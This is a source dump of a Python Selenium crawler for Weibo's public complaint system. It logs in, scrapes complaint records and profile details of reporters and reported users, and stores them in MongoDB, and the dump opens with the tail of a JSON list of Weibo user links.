\"independencei989\"\n ], \n [\n \"http://weibo.com/u/1347280187\", \n \"克服进化论的朱Sir\"\n ], \n [\n \"http://weibo.com/u/6554443743\", \n \"电影大鸟\"\n ], \n [\n \"http://weibo.com/u/6496363207\", \n \"Henry_Han_IPR\"\n ], \n [\n \"http://weibo.com/u/6075978015\", \n \"一个为生活发声的地方\"\n ], \n [\n \"http://weibo.com/u/2751779283\", \n \"土豪榜叔\"\n ], \n [\n \"http://weibo.com/u/6341984206\", \n \"诸葛亮亮律师\"\n ], \n [\n \"http://weibo.com/u/1578078673\", \n \"一脉印象\"\n ], \n [\n \"http://weibo.com/u/5649081220\", \n \"风乎舞雩_KAZE\"\n ], \n [\n \"http://weibo.com/u/6222824749\", \n \"起个什么名字好呢-02\"\n ], \n [\n \"http://weibo.com/u/5498125999\", \n \"即刻\"\n ], \n [\n \"http://weibo.com/u/2242945720\", \n \"快拉脱离\"\n ], \n [\n \"http://weibo.com/u/5850456137\", \n \"阳光七星投资集团\"\n ], \n [\n \"http://weibo.com/u/2081309513\", \n \"1Freekiwi\"\n ], \n [\n \"http://weibo.com/u/1742335401\", \n \"啊呦喂-嘿\"\n ], \n [\n \"http://weibo.com/u/1961261875\", \n \"有法依\"\n ], \n [\n \"http://weibo.com/u/1447685703\", \n \"朝来夕去\"\n ], \n [\n \"http://weibo.com/u/1815608542\", \n \"严MI\"\n ], \n [\n \"http://weibo.com/u/2074743167\", \n \"BiuBiuBiu-021\"\n ], \n [\n \"http://weibo.com/u/3975175672\", \n \"腹肌工场\"\n ]\n ]\n}\n```\n" }, { "alpha_fraction": 0.6069757342338562, "alphanum_fraction": 0.6112292408943176, "avg_line_length": 39.308570861816406, "blob_id": "faf6c80f9a9aab01a2f7451076574bde546c2bf3", 
"content_id": "85d13ee47d623a1f347e1995f21c20d74c9da3e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7059, "license_type": "no_license", "max_line_length": 122, "num_lines": 175, "path": "/weibo.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "# from gevent import monkey\n# monkey.patch_all()\n# from gevent import spawn, joinall\nimport multiprocessing as mp\n\nimport os, sys\nimport numpy as np\nfrom driver import getDriver\nfrom conf import ACCOUNT, PWD, IMPLICIT_WAIT_DRIVER, SLEEP_NEXT_COMPLAINTS_PAGE, SLEEP_NEXT_COMPLAINT, \\\n RETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT, RESTART_EXCEPTION_COUNT, RESTART_TIMEOUT_EXCEPTION_COUNT,\\\n SAVE_COMPAINT_BATCH, N_WORKER, WEB_DRIVER\nfrom mongo import MongoHelper\nfrom extract import *\nfrom selenium.common.exceptions import TimeoutException\n\ndef login(driver):\n # Login\n driver.get('http://weibo.com/login.php')\n driver.implicitly_wait(IMPLICIT_WAIT_DRIVER)\n driver.find_element_by_xpath('//*[@id=\"loginname\"]').clear()\n driver.find_element_by_xpath('//*[@id=\"loginname\"]').send_keys(ACCOUNT)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[2]/div/input').clear()\n time.sleep(1)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[2]/div/input').send_keys(PWD)\n time.sleep(1)\n driver.find_element_by_xpath('//*[@id=\"pl_login_form\"]/div/div[3]/div[6]/a').click()\n time.sleep(1)\n print('>> Successfully Logged In!')\n\ndef getComplaintUrls(driver):\n\n # Enter http://service.account.weibo.com\n driver.get('http://service.account.weibo.com/?type=5&status=4')\n page_count = 1\n print('>> Begin Crawling Complaint Urls...')\n while True:\n # TODO: if page_count > total, break\n # Iterate list in each page\n print(f'>>>> Page: {page_count}')\n complaint_urls = []\n for info in driver.find_elements_by_xpath('//div[@id=\"pl_service_showcomplaint\"]/table[@class=\"m_table\"]'\n '/tbody/tr[not(@class)]'):\n # print(info.text)\n # print(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'),\n # info.find_element_by_xpath('td[3]/a').text,\n # info.find_element_by_xpath('td[4]/a').text,\n # )\n # print(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'))\n complaint_urls.append(info.find_element_by_xpath('td[2]/div[@class=\"m_table_tit\"]/a').get_attribute('href'))\n\n try:\n # Next page\n next = driver.find_element_by_xpath('//a[@class=\"W_btn_c\"][last()]') # if already at last page, will click 上一页\n except:\n print('Next page not found')\n break\n\n print('>>>> Writing to Files...')\n with open('complaint_urls.txt', 'a') as f:\n f.write('\\n'.join(complaint_urls) + '\\n')\n\n time.sleep(SLEEP_NEXT_COMPLAINTS_PAGE)\n next.click()\n page_count += 1\n\ndef getComplaintDetail(url, driver, driver_no, retry=0):\n try:\n driver.get(url)\n except TimeoutException as e: # selenium exception type\n if retry >= RETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT:\n print(f'[{driver_no}] >>>> TimeoutException still occurs in {retry} Retries, Raise...')\n raise(e)\n else:\n retry += 1\n print(f'[{driver_no}] >>>> Timeout, retrying {retry}...')\n # driver = getChrome(headless=True)\n # login(driver)\n return getComplaintDetail(url, driver, driver_no, retry)\n\n try:\n title = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[1]/div[2]/h2').text\n except:\n title = '' # not necessary\n\n print(f'[{driver_no}] >>>> Begin extractReporters')\n reporters, 
actual_reporter_count = extractReporters(driver)\n print(f'[{driver_no}] >>>> Begin extractReports')\n reports = extractReports(driver, reporters)\n print(f'[{driver_no}] >>>> Begin extractRumor')\n rumor = extractRumor(driver)\n print(f'[{driver_no}] >>>> Begin extractOfficial')\n official = extractOfficial(driver)\n print(f'[{driver_no}] >>>> Begin extractLooks')\n looks = extractLooks(driver)\n\n return {\n 'title': title,\n 'reports': reports,\n 'actual_reporter_count': actual_reporter_count,\n 'rumor': rumor,\n 'official': official,\n 'looks': looks\n }\n\ndef restart_program():\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\ndef getComplaintDetails(urls, driver_no):\n driver = getDriver(driver=WEB_DRIVER, driver_no=driver_no)\n login(driver)\n print(f'[{driver_no}] >> Begin Crawling Complaint Details for {len(urls)} pages...')\n\n mongo = MongoHelper()\n complaints = []\n exception_count = 0\n timeout_exception_count = 0\n page_count = 0\n for url in urls:\n # restart when come across too many timeouts\n if timeout_exception_count >= RESTART_TIMEOUT_EXCEPTION_COUNT:\n print(f'[{driver_no}] >> Timeout Excepiton reach {RESTART_EXCEPTION_COUNT}, trying to restart program!')\n restart_program()\n elif exception_count >= RESTART_EXCEPTION_COUNT:\n print(f'[{driver_no}] >> Exception reach {RESTART_EXCEPTION_COUNT}, trying to restart program!')\n restart_program()\n\n page_count += 1\n print(f'\\n[{driver_no}] >>>> Complaint {page_count}, URL: {url}')\n try:\n time.sleep(SLEEP_NEXT_COMPLAINT)\n complaint = getComplaintDetail(url, driver, driver_no)\n print(complaint)\n complaints.append({'url': url, **complaint})\n except Exception as e:\n print(f'[{driver_no}] >>>> Got Exception: {traceback.format_exc()}, URL: {url}')\n exception_count += 1\n if type(e) == TimeoutException:\n timeout_exception_count += 1\n\n complaint_count = len(complaints)\n if complaint_count == SAVE_COMPAINT_BATCH:\n print(f'\\n[{driver_no}] >> Writing {complaint_count} complaints to mongo...')\n mongo.update(complaints)\n complaints = []\n\n # update remaining results\n if len(complaints) != 0:\n mongo.update(complaints)\n print(f'\\n[{driver_no}] >> Writing {len(complaints)} complaints to mongo...')\n else:\n pass\n print(f'[{driver_no}] >> All Complaints Crawling Completed!')\n\ndef getComplaintDetailsMultiWorker(n_worker):\n with open('complaint_urls.txt') as f:\n urls = f.read().split('\\n')\n mongo = MongoHelper()\n crawled_urls = mongo.getCrawledUrls()\n todo_urls = [url for url in urls if url not in crawled_urls]\n print(f'>> {len(crawled_urls)}/{len(urls)} urls has been crawled, remain: {len(todo_urls)}')\n todo_urls_list = np.array_split(todo_urls, n_worker)\n\n # Concurrent\n # joinall([spawn(getComplaintDetails, urls, i) for i, urls in enumerate(urls_list)])\n pool = mp.Pool(n_worker)\n # Create post object\n jobs = [pool.apply_async(getComplaintDetails, (urls, i)) for i, urls in enumerate(todo_urls_list)]\n return [job.get() for job in jobs]\n\n\nif __name__ == '__main__':\n # getComplaintUrls(driver)\n import cProfile\n cProfile.run(f'getComplaintDetailsMultiWorker({N_WORKER})')" }, { "alpha_fraction": 0.779411792755127, "alphanum_fraction": 0.7941176295280457, "avg_line_length": 7.714285850524902, "blob_id": "e0648303ba09b85e06d52919cb51279ce0f2bdce", "content_id": "8d2840cedf9b68a5c84754b0f9fd0bbdd3821e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 68, "license_type": "no_license", "max_line_length": 14, "num_lines": 7, 
"path": "/requirements.txt", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "requests\r\nbeautifulsoup4\r\nscrapy\r\nselenium\r\npymongo\r\nnumpy\r\ngevent\r\n" }, { "alpha_fraction": 0.6776556968688965, "alphanum_fraction": 0.6886447072029114, "avg_line_length": 33.14583206176758, "blob_id": "9749472458950162543a7071e7ff761c6c486e7e", "content_id": "e857c4b8449cfb91b0cc8c9a872b8166dde71abc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 101, "num_lines": 48, "path": "/driver.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import platform\nfrom selenium import webdriver\nimport random\n\n\ndef getChrome(headless=True):\n options = webdriver.ChromeOptions()\n if headless == True:\n options.add_argument('--headless')\n options.add_argument('--disable-notifications')\n options.add_argument(\"--window-size=1920x1080\")\n options.add_argument('--no-sandbox')\n\n # download and put chromedriver_to the path first\n if platform.system() == 'Windows':\n driver = webdriver.Chrome(executable_path='./chromedriver_win32.exe', chrome_options=options)\n elif platform.system() == 'Linux':\n driver = webdriver.Chrome(executable_path='./chromedriver_linux', chrome_options=options)\n else:\n driver = webdriver.Chrome(executable_path='./chromedriver_mac', chrome_options=options)\n\n driver.maximize_window()\n return driver\n\ndef getFirefox(headless=True):\n options = webdriver.FirefoxOptions()\n if headless == True:\n options.add_argument('--headless')\n\n options.add_argument('--disable-notifications')\n options.add_argument(\"--window-size=1920x1080\")\n options.add_argument('--no-sandbox')\n\n # download and put geckodriver to the path first\n driver = webdriver.Firefox(executable_path='./geckodriver', options=options)\n\n driver.maximize_window()\n return driver\n\ndef getDriver(driver, driver_no):\n if driver == 'Chrome':\n driver = getChrome(headless=True)\n elif driver == 'Firefox':\n driver = getFirefox(headless=True)\n else:\n driver = random.choice([getChrome, getFirefox])(headless=True)\n print(f'{[driver_no]} Random chose {type(driver)}')\n return driver" }, { "alpha_fraction": 0.6645435094833374, "alphanum_fraction": 0.7133758068084717, "avg_line_length": 17.84000015258789, "blob_id": "4d3d49dcc9221c06092b33e2f98114ea57a0e9d9", "content_id": "dca16827b02ff6293a4c944fcf61041b61030ab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 40, "num_lines": 25, "path": "/conf.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "ACCOUNT = ''\nPWD = ''\n\nMONGO_HOST = ''\nMONGO_PORT = 30000\nMONGO_DATABASE = ''\nMONGO_USERNAME = ''\nMONGO_PASSWORD= ''\nMONGO_COLLECTION = ''\n\nWEB_DRIVER = 'Chrome'\nN_WORKER = 4\n\nIMPLICIT_WAIT_DRIVER = 15\n\nSAVE_COMPAINT_BATCH = 10\nRESTART_EXCEPTION_COUNT = 30\nRESTART_TIMEOUT_EXCEPTION_COUNT = 3\nRETRY_COMPLAINT_DETAIL_TIMEOUT_COUNT = 1\nSLEEP_NEXT_COMPLAINTS_PAGE = 1\nSLEEP_NEXT_COMPLAINT = 1\n\nREPORTER_MAX_ITER = 100\nSLEEP_NEXT_REPORTER = 0.5\nSLEEP_NEXT_REPORTS_PAGE = 0.5\n" }, { "alpha_fraction": 0.6009767651557922, "alphanum_fraction": 0.608632504940033, "avg_line_length": 46.35625076293945, "blob_id": "736e2b69e00690ec37acd1cc710287481196e333", "content_id": "6c5ffe746fc4cd5407914618b6f83ab0bf016535", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7648, "license_type": "no_license", "max_line_length": 134, "num_lines": 160, "path": "/extract.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "import traceback\nimport time\nimport re\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom conf import SLEEP_NEXT_REPORTER, SLEEP_NEXT_REPORTS_PAGE, REPORTER_MAX_ITER\n\ndef extractReporter(driver):\n reporter = driver.find_element_by_xpath(\n '//div[@class=\"W_main_half_l\"]//div[@class=\"user bg_blue2 clearfix\"]')\n reporter_name = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n reporter_url = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').get_attribute('href')\n reporter_img_url = reporter.find_element_by_xpath(\n '//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[2]/div/img').get_attribute('src')\n reporter_gender = reporter.find_element_by_xpath('p[@class=\"mb\"]/img').get_attribute('class')\n reporter_location = reporter.find_element_by_xpath('p[@class=\"mb\"]').text\n reporter_description = reporter.find_element_by_xpath('p[last()]').text\n\n return {'reporter_url': reporter_url,\n 'reporter_name': reporter_name,\n 'reporter_img_url': reporter_img_url,\n 'reporter_gender': reporter_gender,\n 'reporter_location': reporter_location,\n 'reporter_description': reporter_description,\n }\n\ndef extractReporters(driver):\n # TODO: one reporter has multiple reports: http://service.account.weibo.com/show?rid=K1CaK6wBk7agg\n reporter_count_text = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[1]/span[2]').text\n if re.match('\\(共有', reporter_count_text):\n reporter_count = 20\n actual_reporter_count = int(reporter_count_text.split(sep='共有')[1].split(sep='人')[0])\n else:\n reporter_count = int(reporter_count_text.split(sep='共')[1].split(sep='人')[0])\n actual_reporter_count = reporter_count\n print('Reporter Count: {}, Actual: {}'.format(reporter_count, actual_reporter_count))\n\n if reporter_count == 1:\n crawled_reporters = [extractReporter(driver)]\n else:\n iter = 0\n crawled_reporters = []\n crawled_reporter_names = []\n while True:\n if iter > REPORTER_MAX_ITER:\n print(f'reporter iter exceeds {REPORTER_MAX_ITER}, break')\n break\n\n iter += 1\n print('reporter iter: {}'.format(iter))\n if len(crawled_reporter_names) == reporter_count:\n break\n\n try: # StaleElementReferenceException, if no try, will throw not-attached element exception\n reporter = driver.find_element_by_xpath(\n '//div[@class=\"W_main_half_l\"]//div[@class=\"user bg_blue2 clearfix\"]')\n reporter_name = reporter.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n\n if reporter_name not in crawled_reporter_names:\n crawled_reporters.append(extractReporter(driver))\n crawled_reporter_names.append(reporter_name)\n else:\n print('duplicated reporter')\n\n next_reporter = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[2]/div[1]/div/div[1]/a')\n next_reporter.click()\n time.sleep(SLEEP_NEXT_REPORTER)\n except:\n print('Reporter iter exception: {}'.format(traceback.format_exc()))\n continue\n\n return crawled_reporters, actual_reporter_count\n\ndef extractReports(driver, crawled_reporters):\n crawled_reports_count = 0\n while True:\n reports = driver.find_elements_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[1]/div/div/div[1]/div')\n for report in reports:\n report_time_text = 
report.find_element_by_xpath('p[@class=\"publisher\"]').text\n if report_time_text != '举报人:':\n report_time = report_time_text.split('举报人陈述时间:')[1]\n report_text = report.find_element_by_xpath('div[@class=\"feed clearfix\"]/div[@class=\"con\"]').text\n reporter_url = report.find_element_by_xpath(\n 'div[@class=\"feed clearfix\"]/div[@class=\"con\"]/a').get_attribute('href')\n for r in crawled_reporters:\n if r['reporter_url'] == reporter_url:\n r['report_time'] = report_time\n r['report_text'] = report_text\n else:\n pass\n else:\n print('Reporter deleted report')\n pass\n crawled_reports_count += len(reports)\n print('crawled reporters: {}, crawled reports: {}'.format(len(crawled_reporters), crawled_reports_count))\n\n try:\n next_page = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[1]/div/div/div[2]/div/a[@class=\"next\"]')\n next_page.click()\n time.sleep(SLEEP_NEXT_REPORTS_PAGE)\n print('Go to next reports page')\n except:\n break\n\n return crawled_reporters\n\ndef extractRumor(driver):\n rumorer = driver.find_element_by_xpath('//div[@class=\"W_main_half_r\"]//div[@class=\"user bg_orange2 clearfix\"]')\n rumorer_name = rumorer.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').text\n rumorer_url = rumorer.find_element_by_xpath('p[@class=\"mb W_f14\"]/a[1]').get_attribute('href')\n rumorer_gender = rumorer.find_element_by_xpath('p[@class=\"mb\"]/img').get_attribute('class')\n rumorer_location = rumorer.find_element_by_xpath('p[@class=\"mb\"]').text\n rumorer_description = rumorer.find_element_by_xpath('p[last()]').text\n crawled_rumor = {\n 'rumorer_name': rumorer_name,\n 'rumorer_url': rumorer_url,\n 'rumorer_gender': rumorer_gender,\n 'rumorer_location': rumorer_location,\n 'rumorer_description': rumorer_description,\n }\n\n rumor = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[4]/div[2]/div/div/div/div')\n # TODO: handle deleted rumor weibo\n rumor_time_text = rumor.find_element_by_xpath('p[@class=\"publisher\"]').text\n if rumor_time_text != '被举报微博':\n rumor_time = rumor_time_text.split('被举报微博 发布时间:')[1].split(' | 原文')[0]\n\n try:\n rumor_url = rumor.find_element_by_xpath('p[@class=\"publisher\"]/a').get_attribute('href')\n except:\n print('Can not find original url of rumor')\n rumor_url = ''\n\n rumor_text = rumor.find_element_by_xpath('div[@class=\"feed bg_orange2 clearfix\"]/div[@class=\"con\"]').text\n rumorer_url = rumor.find_element_by_xpath(\n 'div[@class=\"feed bg_orange2 clearfix\"]/div[@class=\"con\"]/a').get_attribute('href')\n assert rumorer_url == crawled_rumor['rumorer_url']\n crawled_rumor['rumor_url'] = rumor_url\n crawled_rumor['rumor_time'] = rumor_time\n crawled_rumor['rumor_text'] = rumor_text\n else:\n print('Rumor weibo deleted')\n pass\n\n return crawled_rumor\n\ndef extractOfficial(driver):\n # TODO: multiple times of official: http://service.account.weibo.com/show?rid=K1CaK6wBk7agg\n official_text = driver.find_element_by_xpath('//*[@id=\"pl_service_common\"]/div[3]/div/div/p').text\n crawled_official = {\n 'official_text': official_text\n }\n return crawled_official\n\ndef extractLooks(driver):\n crawled_looks = []\n for look in driver.find_elements_by_xpath('//*[@id=\"pl_service_looker\"]/div/ul/li'):\n looker_url = look.find_element_by_xpath('a').get_attribute('href')\n looker_name = look.find_element_by_xpath('a').get_attribute('title')\n crawled_looks.append([looker_url, looker_name])\n return crawled_looks" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6382978558540344, 
"avg_line_length": 34.85714340209961, "blob_id": "fa1d4cfd7daff8093364b3de61d56ce4bbf27f0e", "content_id": "c2861255c6e7dbdff341759bf13af5e68a72d3be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 105, "num_lines": 21, "path": "/mongo.py", "repo_name": "simoncos/weibo-complaint-crawler", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\n\nfrom conf import MONGO_HOST, MONGO_PORT, MONGO_DATABASE, MONGO_USERNAME, MONGO_PASSWORD, MONGO_COLLECTION\n\nclass MongoHelper:\n\n def __init__(self):\n self.client = MongoClient(MONGO_HOST, MONGO_PORT)\n self.db = self.client[MONGO_DATABASE]\n self.db.authenticate(MONGO_USERNAME, MONGO_PASSWORD)\n self.collection = self.db[MONGO_COLLECTION]\n\n def update(self, data):\n if type(data) is list:\n for i in data:\n self.collection.replace_one({'url': i['url']}, i, upsert=True)\n else:\n self.collection.replace_one({'url': data['url']}, data, upsert=True)\n\n def getCrawledUrls(self):\n return [i['url'] for i in self.collection.find({})]" } ]
8
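getComplaintDetailsMultiWorker in the record above fans the pending complaint URLs out to N_WORKER processes with np.array_split plus multiprocessing.Pool.apply_async. A minimal self-contained sketch of that fan-out pattern is below; crawl_chunk is a hypothetical stand-in for getComplaintDetails, which in the repo drives one Selenium session per worker.

import multiprocessing as mp
import numpy as np

def crawl_chunk(urls, worker_no):
    # Placeholder for the real per-worker crawl loop (login, fetch, store).
    return [(worker_no, url) for url in urls]

def fan_out(urls, n_worker=4):
    chunks = np.array_split(urls, n_worker)          # roughly equal slices per worker
    with mp.Pool(n_worker) as pool:
        jobs = [pool.apply_async(crawl_chunk, (list(chunk), i))
                for i, chunk in enumerate(chunks)]
        return [job.get() for job in jobs]           # block until every worker finishes

if __name__ == '__main__':
    print(fan_out(['url%d' % i for i in range(10)], n_worker=3))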
Yahnit/Ultimate-Tic-Tac-Toe
https://github.com/Yahnit/Ultimate-Tic-Tac-Toe
1d7d13ac39c9663ac6172548794f395821c9e9d1
e56f7d86af01a4374057970bf032ecbcf324d1c5
e733254344dc1147a44df769d4b0a86bdefb6bb5
refs/heads/master
2020-03-13T21:07:06.477398
2018-07-23T14:58:17
2018-07-23T14:58:17
131,288,641
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.45419830083847046, "alphanum_fraction": 0.4844781756401062, "avg_line_length": 35.97508239746094, "blob_id": "27cf8e07b1a26d20dda80173e28ecc38e9821855", "content_id": "461fa88be265dfd8e3e57a1f5c4ec647d6000dc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22259, "license_type": "no_license", "max_line_length": 172, "num_lines": 602, "path": "/bot.py", "repo_name": "Yahnit/Ultimate-Tic-Tac-Toe", "src_encoding": "UTF-8", "text": "import copy\nimport time\n\nclass Team17():\n def __init__(self):\n self.flag = \"\"\n self.count_plyr = 0\n self.count_opp = 0\n self.depth_limit = 3\n self.max = 10000000000000\n self.timer = 15\n self.startTime = \"\"\n self.utility_matrix = []\n\n def move(self, board, old_move, player_flag):\n self.startTime = time.time()\n self.flag = player_flag\n self.utility_matrix = [0,-1,-10,-100,-1000,1,0,0,100,0,10,0,0,0,0,100,0,0,0,0,1000,0,0,0,0]\n\n if old_move == (-1, -1):\n return (8, 8)\n\n opp_flag = 'o' if self.flag == 'x' else 'x'\n\n temp_board = copy.deepcopy(board)\n temp_block = copy.deepcopy(board.block_status)\n available_moves = board.find_valid_move_cells(old_move)\n\n for i in range(4):\n for j in range(4):\n if temp_block[i][j] == player_flag:\n self.count_plyr += 1\n elif temp_block[i][j] == opp_flag:\n self.count_opp += 1\n\n blocks_available = []\n for move in available_moves:\n x, y = move[0]/4, move[1]/4\n if [x,y] not in blocks_available:\n blocks_available.append([x,y])\n #print blocks_available\n\n plyr_win_block = self.check_win_block(temp_board, blocks_available, player_flag)\n if plyr_win_block != (-1 ,-1):\n return (plyr_win_block[0], plyr_win_block[1])\n\n opp_win_block = self.check_win_block(temp_board, blocks_available, opp_flag)\n if opp_win_block != (-1 ,-1):\n return (opp_win_block[0], opp_win_block[1])\n\n tentative_move, max_depth = (0,0,0), 2\n\n while time.time() - self.startTime < self.timer:\n best_move = tentative_move\n tentative_move = self.minimax(temp_board, old_move, True, player_flag, opp_flag, 0, -self.max, self.max, -1,-1, max_depth)\n max_depth += 1\n\n available_moves = board.find_valid_move_cells(old_move)\n if (best_move[1], best_move[2]) in available_moves:\n return (best_move[1], best_move[2])\n else:\n return random.choice(available_moves)\n\n def minimax(self, board, old_move, is_max, player_sign, opponent_sign, depth, alpha, beta, best_row, best_col, max_depth):\n if time.time() - self.startTime > self.timer:\n return (0, best_row, best_col)\n\n available_moves = board.find_valid_move_cells(old_move)\n\n if depth == max_depth or len(available_moves) == 0:\n utility = self.utility_get(board, player_sign, opponent_sign)\n return (utility, best_row, best_col)\n\n if len(available_moves) > 20 and depth == 0:\n self.depth_limit = min(2, self.depth_limit)\n\n if is_max:\n for move in available_moves:\n temp_board = copy.deepcopy(board)\n temp_board.update(old_move, move, player_sign)\n utility = self.minimax(temp_board, move, not is_max, player_sign, opponent_sign, depth+1 , alpha, beta, best_row, best_col, max_depth) # agains call minimax\n tent_val = utility[0]\n if tent_val > alpha:\n alpha , best_row, best_col = utility[0], move[0], move[1]\n\n if alpha > beta:\n break\n\n if time.time() - self.startTime > self.timer:\n return (utility, best_row, best_col)\n\n return (alpha, best_row, best_col)\n\n else:\n for move in available_moves:\n temp_board = copy.deepcopy(board)\n temp_board.update(old_move, move, opponent_sign)\n 
utility = self.minimax(temp_board, move, not is_max, player_sign, opponent_sign, depth+1 , alpha, beta, best_row, best_col, max_depth)\n                tent_val = utility[0]\n                if tent_val < beta:\n                    beta, best_row, best_col = utility[0], move[0], move[1]\n\n                if alpha > beta:\n                    break\n\n                if time.time() - self.startTime > self.timer:\n                    return (utility[0], best_row, best_col)\n\n            return (beta, best_row, best_col)\n\n    def check_win_block(self, temp_board, blocks_available, flag):\n        for k in blocks_available:\n            board_x, board_y = 4*k[0], 4*k[1]\n            for i in range(4):\n                count_plyr , empty = 0, 0\n                for j in range(4):\n                    if temp_board.board_status[board_x + i][board_y + j] == flag:\n                        count_plyr +=1\n                    elif temp_board.board_status[board_x + i][board_y + j] == '-':\n                        empty, tent_x, tent_y = 1, board_x + i, board_y + j\n                if count_plyr == 3 and empty == 1:\n                    return (tent_x, tent_y)\n\n            for i in range(4):\n                count_plyr , empty = 0, 0\n                for j in range(4):\n                    if temp_board.board_status[board_x + j][board_y + i] == flag:\n                        count_plyr +=1\n                    elif temp_board.board_status[board_x + j][board_y + i] == '-':\n                        empty, tent_x, tent_y = 1, board_x + j, board_y + i\n                if count_plyr == 3 and empty == 1:\n                    return (tent_x, tent_y)\n\n            #DIAMOND1\n            count_plyr , empty = 0, 0\n\n            if temp_board.board_status[board_x + 1][board_y + 0] == flag:\n                count_plyr +=1\n\n            elif temp_board.board_status[board_x + 1][board_y + 0] == '-':\n                empty, tent_x, tent_y = 1, board_x + 1, board_y + 0\n\n            if temp_board.board_status[board_x + 0][board_y + 1] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 0][board_y + 1] == '-':\n                empty, tent_x, tent_y = 1, board_x + 0, board_y + 1\n\n            if temp_board.board_status[board_x + 2][board_y + 1] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 2][board_y + 1] == '-':\n                empty, tent_x, tent_y = 1, board_x + 2, board_y + 1\n\n            if temp_board.board_status[board_x + 1][board_y + 2] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 1][board_y + 2] == '-':\n                empty, tent_x, tent_y = 1, board_x + 1, board_y + 2\n\n            if count_plyr == 3 and empty == 1:\n                return (tent_x, tent_y)\n\n\n            #DIAMOND2\n            count_plyr , empty = 0, 0\n\n            if temp_board.board_status[board_x + 1][board_y + 1] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 1][board_y + 1] == '-':\n                empty, tent_x, tent_y = 1, board_x + 1, board_y + 1\n\n            if temp_board.board_status[board_x + 0][board_y + 2] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 0][board_y + 2] == '-':\n                empty, tent_x, tent_y = 1, board_x + 0, board_y + 2\n\n            if temp_board.board_status[board_x + 2][board_y + 2] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 2][board_y + 2] == '-':\n                empty, tent_x, tent_y = 1, board_x + 2, board_y + 2\n\n            if temp_board.board_status[board_x + 1][board_y + 3] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 1][board_y + 3] == '-':\n                empty, tent_x, tent_y = 1, board_x + 1, board_y + 3\n\n            if count_plyr == 3 and empty == 1:\n                return (tent_x, tent_y)\n\n            #DIAMOND3\n            count_plyr , empty = 0, 0\n\n            if temp_board.board_status[board_x + 2][board_y + 0] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 2][board_y + 0] == '-':\n                empty, tent_x, tent_y = 1, board_x + 2, board_y + 0\n\n            if temp_board.board_status[board_x + 1][board_y + 1] == flag:\n                count_plyr +=1\n            elif temp_board.board_status[board_x + 1][board_y + 1] == '-':\n                empty, tent_x, tent_y = 1, board_x + 1, board_y + 1\n\n            if temp_board.board_status[board_x + 3][board_y + 1] == flag:\n                count_plyr += 
1\n elif temp_board.board_status[board_x + 3][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 3, board_y + 1\n\n if temp_board.board_status[board_x + 2][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 2\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n #DIAMOND4\n count_plyr , empty = 0, 0\n\n if temp_board.board_status[board_x + 2][board_y + 1] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 1] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 1\n\n if temp_board.board_status[board_x + 1][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 1][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 1, board_y + 2\n\n if temp_board.board_status[board_x + 3][board_y + 2] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 3][board_y + 2] == '-':\n empty, tent_x, tent_y = 1, board_x + 3, board_y + 2\n\n if temp_board.board_status[board_x + 2][board_y + 3] == flag:\n count_plyr +=1\n elif temp_board.board_status[board_x + 2][board_y + 3] == '-':\n empty, tent_x, tent_y = 1, board_x + 2, board_y + 